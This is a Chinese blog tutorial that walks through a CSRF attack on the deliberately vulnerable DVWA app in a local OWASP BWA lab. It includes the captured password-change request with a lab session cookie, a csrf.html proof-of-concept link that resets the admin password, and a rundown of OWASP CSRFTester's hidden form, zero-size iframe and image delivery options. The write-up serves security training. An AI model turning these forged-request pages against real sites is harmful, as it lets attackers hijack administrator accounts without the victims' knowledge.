CSRF漏洞測試案例

CSRF***流程爲:

***者發現CSRF漏洞——構造代碼——發送給受害人——受害人打開——受害人執行代碼——完成***

完成***成功的條件:

    管理員正在網站後臺,或則管理員的session並沒有失效。


測試網站:

    owaspbwa環境中的DVWA應用環境


測試內容爲CSRF漏洞

如圖所示:

wKiom1iayGTAVmDmAADjTuKjrxw193.jpg-wh_50


修改登陸密碼的HTTP請求內容如下:

GET /dvwa/vulnerabilities/csrf/?password_new=admin&password_conf=admin&Change=Change HTTP/1.1

Host: 192.168.232.132

Connection: close

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2984.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Referer: https://192.168.232.132/dvwa/vulnerabilities/csrf/

Accept-Encoding: gzip, deflate, sdch, br

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6

Cookie: security=low; PHPSESSID=3i35050qluj2hvvqu9rk760o81; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada


Nginx測試

本地搭建nginx環境,僞造http請求,提交http請求,直接修改192.168.232.132中DVWA的登陸口令!!!

創建csrf.html文件,內容如下:

<html>

<head>

<title>csrf漏洞測試</title>

</head>

<body>

This is a CSRF test.

<a href="https://192.168.232.132/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change">點這裏</a>


</body>

</html>


訪問CSRF.html,如圖所示

wKiom1iayRSTfOzyAAAUhFABRSA311.jpg


點擊超鏈接,成功發送請求,且修改了DVWA的登錄口令,如圖所示:

wKioL1iayV-iFB4WAADtry6CO14288.jpg-wh_50


使用修改後的密碼可以直接登陸後臺!!!


工具:OWASP-CSRFTester-1.0.jar,可以自動生成不同內容的***文件。

瀏覽器設置代理,端口爲8008,軟件看下有沒有token的存在,然後開始使用。


軟件中Report Type了是讓你選擇用什麼方法來進行***:

Forms:創建一個form表單。內容爲hidden(隱藏),用戶不可見(可POST、GET)

iFrame:創建一個iframe框架,高寬爲0,用戶不可見。(可POST、GET)

IMG:創建一個IMG標籤(只能GET)。

XHR:創建一個AJAX請求(可POST、GET)

Link:創建一個a標籤的超鏈接(只能GET)


通常使用第一個就可以了

第二個容易找不到對象(如果你是新手,對JavaScript不熟的話,不建議選擇這個)

第三個只能發送GET請求,有限制。

第四個有跨域限制,有的瀏覽器不允許發送跨域請求,除非網站有設置。

第五個需要點擊才能觸發(當然可以修改爲自動觸發),還有一個是他也只能發送GET請求。


本次測試全部爲本地環境,如有雷同,純屬巧合!!!

就到這裏吧!!!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章